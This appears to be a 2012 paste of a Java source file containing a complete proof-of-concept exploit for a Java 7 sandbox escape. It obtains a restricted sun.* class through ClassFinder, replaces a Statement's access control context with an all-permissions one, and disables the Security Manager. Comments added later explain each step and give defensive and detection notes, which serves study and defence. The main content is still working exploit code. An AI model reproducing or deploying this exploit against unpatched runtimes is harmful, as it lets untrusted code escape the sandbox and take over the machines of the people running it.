
Untitled

a guest
Aug 30th, 2012
  1. import java.beans.*;
  2. import java.io.File;
  3. import java.lang.reflect.Field;
  4. import java.net.URL;
  5. import java.security.*;
  6. import java.security.cert.Certificate;
  7.  
  8. import com.sun.beans.finder.ClassFinder;
  9.  
/**
 * Proof-of-concept showing that code running under a Java 7 Security Manager
 * can switch that Security Manager off, after which the process is no longer
 * sandboxed.
 *
 * <p>Reviewer summary of the trust-boundary failure shown here: the sandbox
 * assumes untrusted code can never obtain classes from restricted packages
 * ({@code sun.*}). {@code com.sun.beans.finder.ClassFinder} hands one out
 * anyway, and a helper on that restricted class exposes a private field of
 * {@link Statement} that decides which access control context the statement
 * runs under. Everything after that is ordinary, documented API use.
 *
 * <p>Defensive notes:
 * <ul>
 *   <li>An in-process Security Manager is only as strong as every privileged
 *       JDK class that performs (or forgets) a package-access check. Do not
 *       use it as the sole barrier around untrusted code; use process- or
 *       OS-level isolation and keep the runtime patched. Current JDKs
 *       deprecate the Security Manager altogether.</li>
 *   <li>Review and detection hooks visible in this listing: untrusted code
 *       that references {@code com.sun.beans.finder.ClassFinder},
 *       {@code sun.awt.SunToolkit}, or builds a {@code java.beans.Statement}
 *       / {@code Expression} naming {@code setSecurityManager} or
 *       {@code getField}; and a JVM whose {@code System.getSecurityManager()}
 *       becomes {@code null} after start-up.</li>
 * </ul>
 *
 * <p>NOTE(review): this looks like the publicly reported 2012 Java 7 sandbox
 * escape; the page gives no advisory id or fixed release, so confirm both
 * against the vendor bulletin before citing them.
 */
public class Java7ZeroDay {

    /**
     * Replaces the installed Security Manager with {@code null} by running
     * {@code System.setSecurityManager(null)} through a
     * {@link Statement} whose access control context has been swapped for one
     * that carries {@link AllPermission}.
     *
     * @throws Throwable anything raised by the reflective calls below; nothing
     *         is caught or translated here
     */
    public static void disableSecurity() throws Throwable {

        // Step 1 (the actual flaw): obtain sun.awt.SunToolkit, a class in a
        // restricted package. Under a Security Manager this lookup should be
        // refused for untrusted callers; the original author notes that it is
        // not. Every later step depends on this one succeeding.
        Class<?> sun_awt_SunToolkit = ClassFinder.findClass("sun.awt.SunToolkit");

        // The rest is, in the author's words, just a short way to exploit
        // having access to that class.

        // All calls go through java.beans.Expression / Statement by name
        // rather than as direct method calls; the author's stated reason is
        // that the verifier would refuse to load this class if it referenced
        // those methods directly.

        // Step 2: invoke SunToolkit.getField(Statement.class, "acc") to get an
        // accessor for the private "acc" field of Statement. The author notes
        // the method is new in Java 7, and that earlier versions offer other,
        // more convoluted, ways to elevate permissions once restricted
        // packages are reachable -- i.e. the root cause is step 1, not this
        // particular helper.
        Expression expr = new Expression(sun_awt_SunToolkit, "getField", new Object[] { Statement.class, "acc" });
        expr.execute();
        Field acc_Field = ((Field) expr.getValue());

        // Step 3: build an access control context whose single protection
        // domain is granted AllPermission. The code source is the URL
        // "file:///" with an empty certificate array.
        Permissions allPerms = new Permissions();
        allPerms.add(new AllPermission());
        AccessControlContext allPermAcc = new AccessControlContext(new ProtectionDomain[] {
                new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), allPerms)
        });

        // Step 4: create a statement that disables the security manager.
        // new Object[1] is a one-element array holding null, so the call it
        // describes is System.setSecurityManager(null). At this point the
        // statement still carries this (untrusted) code's own access control
        // context.
        Statement disableSecurityManager = new Statement(java.lang.System.class, "setSecurityManager", new Object[1]);

        // Step 5: use the private "acc" accessor from step 2 to replace the
        // statement's access control context with the all-permissions one
        // from step 3.
        acc_Field.set(disableSecurityManager, allPermAcc);

        // Step 6: execute the statement, which now runs with all permissions.
        // After this returns, no Security Manager is installed in the JVM.
        disableSecurityManager.execute();
    }

    /**
     * Test harness. Intended to be started with a Security Manager installed:
     * {@code java -Djava.security.manager Java7ZeroDay}.
     *
     * <p>Directory listing of {@code C:/} is used as the probe: if it raises
     * {@link SecurityException} the sandbox is active, so
     * {@link #disableSecurity()} is called and the listing is attempted again
     * as evidence that the check is gone.
     *
     * @param args unused
     * @throws Throwable propagated from {@link #disableSecurity()}
     */
    public static void main(String[] args) throws Throwable {
        try {
            // Probe: succeeds silently when no Security Manager is installed.
            new File("C:/").list();
            System.out.println("No Security Manager present");
        } catch (SecurityException ex) {
            // Sandbox is active; remove it, then repeat the file access that
            // was just denied.
            disableSecurity();
            System.out.println("Security Manager disabled. Proof:");
            // NOTE(review): File.listFiles() returns null when the path is not
            // a readable directory (for example on a host without C:/), which
            // would make this loop throw NullPointerException.
            for (File file : new File("C:/").listFiles())
                System.out.println("\t" + file);
        }
    }
}